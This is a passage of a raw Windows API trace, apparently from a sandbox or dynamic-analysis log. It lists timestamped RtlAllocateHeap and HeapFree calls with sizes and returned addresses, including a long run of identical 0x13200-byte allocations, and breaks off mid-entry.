[0251.789] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x434c80 | out: hHeap=0x400000) returned 1 [0251.790] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1fc7) returned 0x44d940 [0251.790] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x433730 | out: hHeap=0x400000) returned 1 [0251.790] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x435de0 | out: hHeap=0x400000) returned 1 [0251.790] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1657) returned 0x433730 [0251.790] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xb20) returned 0x434d90 [0251.790] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x590) returned 0x44f910 [0251.790] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x433730 | out: hHeap=0x400000) returned 1 [0251.790] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x434d90 | out: hHeap=0x400000) returned 1 [0251.790] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2f96) returned 0x433730 [0251.790] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.790] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44f910 | out: hHeap=0x400000) returned 1 [0251.790] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2b47) returned 0x4366d0 [0251.791] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x15b7) returned 0x44d940 [0251.791] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xad0) returned 0x44ef00 [0251.791] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4366d0 | out: hHeap=0x400000) returned 1 [0251.792] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.792] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44ef00 | out: hHeap=0x400000) returned 1 [0251.792] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2697) returned 0x4366d0 [0251.792] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1367) returned 0x44d940 [0251.792] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9a0) returned 0x44ecb0 [0251.792] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4366d0 | out: hHeap=0x400000) returned 1 [0251.792] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.792] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x474d) returned 0x4366d0 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x433730 | out: hHeap=0x400000) returned 1 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44ecb0 | out: hHeap=0x400000) returned 1 [0251.793] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x920) returned 0x44d940 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.793] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1b47) returned 0x44d940 [0251.793] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xd90) returned 0x43ae30 [0251.793] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x6d0) returned 0x44f490 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x43ae30 | out: hHeap=0x400000) returned 1 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44f490 | out: hHeap=0x400000) returned 1 [0251.793] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x5d0) returned 0x418910 [0251.793] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x6adf) returned 0x4193e0 [0251.793] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4366d0 | out: hHeap=0x400000) returned 1 [0251.794] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.794] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1887) returned 0x44d940 [0251.794] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xc30) returned 0x44f1d0 [0251.794] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x620) returned 0x418910 [0251.794] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.794] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44f1d0 | out: hHeap=0x400000) returned 1 [0251.794] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.794] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x8f0) returned 0x44d940 [0251.794] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x480) returned 0x418910 [0251.794] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x240) returned 0x44e240 [0251.795] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.795] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0251.795] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44e240 | out: hHeap=0x400000) returned 1 [0251.795] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x40) returned 0x410950 [0251.795] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40b3e0 | out: hHeap=0x400000) returned 1 [0251.795] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x42db40 | out: hHeap=0x400000) returned 1 [0251.795] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.796] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x410950 | out: hHeap=0x400000) returned 1 [0251.796] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9900) returned 0x4193e0 [0251.797] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1bf0) returned 0x44d940 [0251.799] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.799] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9937) returned 0x42db40 [0251.800] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.800] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x20) returned 0x40b3e0 [0251.800] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9900) returned 0x4193e0 [0251.800] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1bf0) returned 0x44d940 [0251.801] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0251.801] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9937) returned 0x44d940 [0251.803] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4193e0 | out: hHeap=0x400000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x40) returned 0x4109f0 [0251.804] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40b3e0 | out: hHeap=0x400000) returned 1 [0251.804] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x423790 | out: hHeap=0x400000) returned 1 [0251.805] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x43da40 | out: hHeap=0x400000) returned 1 [0251.943] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x410270 | out: hHeap=0x400000) returned 1 [0251.943] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x4193e0 [0251.943] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x437480 [0251.943] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x8) returned 0x408d80 [0251.943] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x457280 [0251.944] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x4192c0 [0251.944] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x408d80 | out: hHeap=0x400000) returned 1 [0251.944] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x46a490 [0251.945] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x18) returned 0x419260 [0251.945] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4192c0 | out: hHeap=0x400000) returned 1 [0251.945] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x47d6a0 [0251.945] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x20) returned 0x40b3e0 [0251.945] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x419260 | out: hHeap=0x400000) returned 1 [0251.945] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x4908b0 [0251.946] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x30) returned 0x4182d0 [0251.946] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40b3e0 | out: hHeap=0x400000) returned 1 [0251.946] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x4a3ac0 [0251.947] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x4b6cd0 [0251.947] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x48) returned 0x4101d0 [0251.947] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4182d0 | out: hHeap=0x400000) returned 1 [0251.947] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x4c9ee0 [0251.948] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x4dd0f0 [0251.948] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1de0080 [0251.949] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x68) returned 0x408d80 [0251.949] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4101d0 | out: hHeap=0x400000) returned 1 [0251.949] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1df3290 [0251.950] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e064a0 [0251.950] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e196b0 [0251.951] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e2c8c0 [0251.951] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x98) returned 0x4050b0 [0251.951] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x408d80 | out: hHeap=0x400000) returned 1 [0251.951] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e3fad0 [0251.952] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e52ce0 [0251.952] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e65ef0 [0251.953] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e79100 [0251.953] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e8c310 [0251.954] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1e9f520 [0251.954] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xe0) returned 0x404ce0 [0251.954] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4050b0 | out: hHeap=0x400000) returned 1 [0251.954] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1eb2730 [0251.955] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1ee0080 [0251.956] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1ef3290 [0251.957] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f064a0 [0251.957] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f196b0 [0251.958] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f2c8c0 [0251.958] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f3fad0 [0251.959] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f52ce0 [0251.959] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f65ef0 [0251.959] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x150) returned 0x40b0b0 [0251.960] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x404ce0 | out: hHeap=0x400000) returned 1 [0251.960] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f79100 [0251.960] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f8c310 [0251.961] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1f9f520 [0251.961] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1fb2730 [0251.961] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1fc5940 [0251.962] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1fd8b50 [0251.962] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1febd60 [0251.963] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x1ffef70 [0251.964] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2012180 [0251.964] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2025390 [0251.965] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x20385a0 [0251.965] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x204b7b0 [0251.966] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x205e9c0 [0251.966] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2071bd0 [0251.966] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1f8) returned 0x418910 [0251.967] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40b0b0 | out: hHeap=0x400000) returned 1 [0251.967] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2084de0 [0251.967] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2097ff0 [0251.968] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x20ab200 [0251.968] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x20be410 [0251.969] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x20e0080 [0251.970] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x20f3290 [0251.971] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21064a0 [0251.971] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21196b0 [0251.972] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x212c8c0 [0251.972] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x213fad0 [0251.973] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2152ce0 [0251.973] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2165ef0 [0251.974] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2179100 [0251.974] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x218c310 [0251.975] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x219f520 [0251.975] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21b2730 [0251.976] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21c5940 [0251.977] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21d8b50 [0251.978] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21ebd60 [0251.978] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x21fef70 [0252.111] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2212180 [0252.111] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2f0) returned 0x418b10 [0252.111] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0252.111] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2225390 [0252.112] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x22385a0 [0252.112] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x224b7b0 [0252.113] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x225e9c0 [0252.113] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2271bd0 [0252.113] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2284de0 [0252.114] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2297ff0 [0252.114] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x22ab200 [0252.115] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x22be410 [0252.115] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x22d1620 [0252.116] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x22e4830 [0252.116] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x22f7a40 [0252.116] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x230ac50 [0252.117] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x231de60 [0252.117] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2331070 [0252.118] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2344280 [0252.118] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2357490 [0252.119] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x236a6a0 [0252.119] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x237d8b0 [0252.119] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2390ac0 [0252.120] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x23a3cd0 [0252.120] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x23b6ee0 [0252.121] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x23ca0f0 [0252.121] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x23dd300 [0252.122] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x23f0510 [0252.122] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2403720 [0252.123] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2416930 [0252.123] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2429b40 [0252.123] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x243cd50 [0252.124] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x244ff60 [0252.124] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2463170 [0252.125] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x468) returned 0x42c5f0 [0252.125] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418b10 | out: hHeap=0x400000) returned 1 [0252.125] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2476380 [0252.125] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2489590 [0252.126] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x249c7a0 [0252.126] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x24af9b0 [0252.127] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x24c2bc0 [0252.127] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x24e0080 [0252.129] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x24f3290 [0252.129] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25064a0 [0252.130] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25196b0 [0252.130] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x252c8c0 [0252.131] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x253fad0 [0252.132] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2552ce0 [0252.132] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2565ef0 [0252.133] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2579100 [0252.133] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x258c310 [0252.134] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x259f520 [0252.134] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25b2730 [0252.135] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25c5940 [0252.135] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25d8b50 [0252.136] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25ebd60 [0252.136] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x25fef70 [0252.137] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2612180 [0252.137] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2625390 [0252.138] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x26385a0 [0252.138] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x264b7b0 [0252.139] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x265e9c0 [0252.139] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2671bd0 [0252.139] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2684de0 [0252.140] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2697ff0 [0252.140] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x26ab200 [0252.141] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x26be410 [0252.142] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x26d1620 [0252.142] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x26e4830 [0252.142] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x26f7a40 [0252.143] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x270ac50 [0252.144] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x271de60 [0252.144] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2731070 [0252.144] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2744280 [0252.145] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2757490 [0252.255] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x276a6a0 [0252.256] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x277d8b0 [0252.256] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2790ac0 [0252.257] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x27a3cd0 [0252.259] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x27b6ee0 [0252.260] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x27ca0f0 [0252.260] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x27dd300 [0252.261] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x27f0510 [0252.261] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x698) returned 0x418910 [0252.261] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x42c5f0 | out: hHeap=0x400000) returned 1 [0252.261] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2803720 [0252.262] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2816930 [0252.262] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2829b40 [0252.262] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x283cd50 [0252.263] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x284ff60 [0252.263] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2863170 [0252.264] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2876380 [0252.264] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2889590 [0252.264] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x289c7a0 [0252.265] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x28af9b0 [0252.265] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x28c2bc0 [0252.266] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x28d5dd0 [0252.266] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x28e8fe0 [0252.266] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x28fc1f0 [0252.267] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x290f400 [0252.267] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2922610 [0252.267] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2935820 [0252.268] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2948a30 [0252.268] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x295bc40 [0252.268] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x296ee50 [0252.269] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2982060 [0252.269] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2995270 [0252.269] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x29a8480 [0252.270] RtlAllocateHeap (HeapHandle=0x400000, 